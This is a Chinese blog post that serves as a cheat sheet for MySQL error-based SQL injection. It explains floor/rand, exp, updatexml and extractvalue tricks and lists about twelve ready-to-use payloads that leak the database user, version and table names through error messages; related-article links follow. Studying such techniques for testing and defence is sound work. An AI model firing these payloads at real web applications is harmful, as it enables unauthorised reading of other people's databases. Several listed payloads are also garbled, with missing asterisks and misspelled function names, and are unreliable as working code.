web安全之报错注入汇总

最新推荐文章于 2024-10-09 15:31:37 发布
最新推荐文章于 2024-10-09 15:31:37 发布
阅读量326 收藏
点赞数
分类专栏: Web安全 文章标签: 网络安全 信息安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/112724930
版权

1 报错注入

MySQL 报错注入主要分为以下几类:

1. BigInt 等数据类型溢出;

2. Xpath 语法错误;

3. count() + rand() + group_by() 导致重复;

4. 空间数据类型函数错误。

1.1 floor()

rand(N) - 返回一个随机浮点数 v,范围是 0<=v<1.0;N 是可选提供的,如果提供了N,则会设定N为一个SEED

floor(x) - 返回不大于 x 的最大整数

count(x) - 返回 x 数据集的数量

错误触发:

虚拟表的主键重复:group by要进行两次运算,第一次是拿group by后面的字段值到虚拟表中去对比前,首先获取group by后面的值;第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算。由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。 

floor(rand(0) *2) 的结果如下:

1.2 exp()

函数语法:exp(int)

适用版本:5.5.5~5.5.49

该函数将会返回e的x次方结果。正常如下图:

报错原理:次方到后边每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。当传递一个大于709的值时,函数exp()就会引起一个重叠错误。根据这个原理,加大整数来溢出:

exp(~(select * from(select user())a))

解释:

1、先查询 select user() 这里面的语句,将这里面查询出来的数据作为一个结果集 取名为 a
2、然后 再 select * from a 查询a ,将 结果集a 全部查询出来

得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

1.3 updatexml()

函数语法:updatexml(XML_document, XPath_string, new_value);

适用版本: 5.1.5+
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据

select updatexml(1,concat(‘!’,(select table_name from information_schema.tables where table_schema=database() limit 0,1),1),1)

  • select updatexml(1,’!a’,1)   用!是为了报错
  • concat(‘!’,database(),1) 拼接语句
  • (select * from a) 加小括号是子查询,有高优先级
  • 报错注入返回的是字符串,所以加上limit限制返回内容

1.4 extractvalue()

函数语法:EXTRACTVALUE (XML_document, XPath_string);

适用版本:5.1.5+

利用原理与updatexml函数相同

payload: and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

1.5 其他报错语句汇总

(从网上找的12条报错语句)

1、通过floor报错,注入语句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );

安全学习交流群:687398569

凌木LSJ
关注
专栏目录
网络安全sql注入语法汇总
你在看屏幕的同时,屏幕也在注视着你
07-07 1万+
SQL注入语法汇总大全
⭐️Web安全之构建可信任的合作环境
AI天才研究院
08-06 1241
随着互联网信息化、云计算和物联网技术的普及,网络安全越来越成为重中之重要。而Web安全又是信息安全的一种重要组成部分,也是最容易被忽视的环节。在这个大的主题下,我们要谈如何构建可信任的合作环境,让Web安全从简单的防火墙演进到更加复杂的攻击面分析和预防手段。构建可信任的合作环境至关重要。首先,需要搞清楚我们的目标。我们的目标不仅仅是保护用户隐私信息,更重要的是建立起互信和信任。基于互信和信任建立的基础上,才能建立起专业的沟通机制,实现信息共享和协同工作。其次,要保证我们的技术能力和能力规模。
WEB渗透学习笔记3——报错注入和盲注
林林木林林L的博客
07-23 693
报错注入 报错注入原理 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息 常用的报错函数 updatexml() updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数; and updatexml(xml_document,Xpathstring,new_value) updatexml(1,concat(0
web安全】——报错注入
Demo不是emo的博客
01-07 1万+
SQL注入之报错注入
exp报错注入
最新发布
My笔记的博客
10-09 846
23是加号的意思这里的意思是709+4,那么为什么要把+号编码呢?我们看到上面payload里的。这里我们是从大到小猜的,
CTFHUB(WEB) 报错注入
qq_54929891的博客
09-17 376
在经历了整数型注入和数字注入后自信满满的打开了报错注入,结果不回显正确内容,只回显正确或错误的情况让我无从下手,没办法,身为小白只能继续去找资料学习一下如何做这种题目了 学了一会儿,发现有很多办法,但我学的是最简单的一种办法,其他办法以后在实践中慢慢的学习 这个方法利用的是count(),rand(),floor(),group by()这几个函数的组合来利用报错信息出来我们需要查询的内容 count():返回匹配指定条件的行数。count(*)返回表中的记录数(不添加的话会出现列不对应的情况,可以试
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 788
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
报错注入
weixin_41489908的博客
09-27 296
不是我不想,你上学我上班,我耽误你前程似锦,你耽误我成家立业,我的眼里都是烟花和生活,你的眼里都是未来和希望。。。 ---- 网易云热评 一、相关函数 1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样 2、floor():向下取整,floor(rand()*2),随机产生0和1两个数 3、groupby:分组排列 4、count(*):统计数量 5、concat():将字符串连接起来 二、通过floor(...
web渗透】专栏文章汇总
武天旭的博客
02-28 1292
一、基础部分 web渗透–1–写在开始 web渗透–2–web安全原则(上) web渗透–3–web安全原则(下) web渗透–4–web渗透测试清单 web渗透–5–自动化漏洞扫描 web渗透–6–Google Hacking 二、渗透测试部分 web渗透–7–web服务器指纹识别 web渗透–8–枚举web服务器应用
Web安全 EmpireCMS漏洞常见漏洞分析及复现(1),2024年最新【工作感悟】
2401_83973995的博客
04-18 1010
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
WebSQL注入攻击
weixin_43916678的博客
11-05 1646
SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。 联合查询的利用前提:页面有显示位 联合注入的过程:判断注入点、判断是整型还是字符型、判断查询列数、判断显示位、获取所有数据库名、获取数据库所有表名、获取字段名、获取字段中的数据 常规思路 判断是否存在注入. 字符型1’ and ‘
SQL注入 学习资料集合
10-20
SQL注入 学习资料集合.rar 压缩包里包含了SQL注入与防注入的学习资料。
Web安全原理剖析(四)——报错注入攻击
热门推荐
Phantom03167的博客
09-10 1万+
报错注入攻击
实验吧 WEB 加了料的报错注入
weixin_43803070的博客
07-23 614
打开页面是post注入,又是报错注入。所以就用到了burp,后来发现burp不好用,加了消息头也不好用,不知道为啥。既然是post那么就用脚本吧。 1.首先正常传参: import requests url="http://ctf5.shiyanbar.com/web/baocuo/index.php" r=requests.session() s=r.post(url,data={'userna...
SQL注入之报错注入方法汇总
wanggonghanfei的博客
10-03 1826
响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面0.2 类型。
web安全 sql盲注和报错注入
m0_68167825的博客
06-13 820
可以基于这个函数,实现盲注。 例: 输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3, 输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4, 输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.根据这两个函数得作用,来做盲注猜测。 输入1’ and ascii(substr(database(),1,1))>99 –
mysql exp注入_Mysql注入之exp报错注入
weixin_39630466的博客
01-21 477
Author:SilentDATE:2017-11-17Warning:实操部分需实现效果,不然就是失败的实验;前言:好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者就跑去测试看哪些函数会出现溢出错误。然后作者发现,当传递一个大于709...
Web攻防训练营:GET报错注入详解
Web安全领域,GET报错注入是一种常见的SQL注入攻击方式,通常发生在使用GET方法传递参数到后台数据库查询时。这种攻击利用了应用程序对错误处理不当的漏洞,使得攻击者可以通过构造特定的请求URL,触发数据库的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值